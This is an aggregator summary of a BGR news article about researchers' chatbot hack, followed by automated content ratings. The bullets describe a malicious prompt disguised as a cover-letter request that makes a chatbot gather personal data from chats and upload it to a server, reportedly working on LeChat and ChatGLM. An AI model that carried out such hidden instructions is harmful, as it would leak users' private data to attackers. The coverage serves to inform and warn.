logo
welcome
BGR

BGR

Chatbot hack shows why you shouldn't trust AI with your personal data

BGR
Summary
Nutrition label

62% Informative

Hackers created a prompt that would instruct a chatbot to collect data from your chats and upload it to a server.

Hackers can disguise malicious prompts as prompts to write cover letters for job applications.

The researchers managed to get the chatbot hack to work with LeChat from French AI company Mistral and Chinese chatbot ChatGLM.

A few weeks ago , we saw a similar hack that would have allowed hackers to extract data from ChatGPT chats.

VR Score

41

Informative language

26

Neutral language

50

Article tone

informal

Language

English

Language complexity

44

Offensive language

not offensive

Hate speech

not hateful

Attention-grabbing headline

not detected

Known propaganda techniques

not detected

Time-value

long-living

Affiliate links

no affiliate links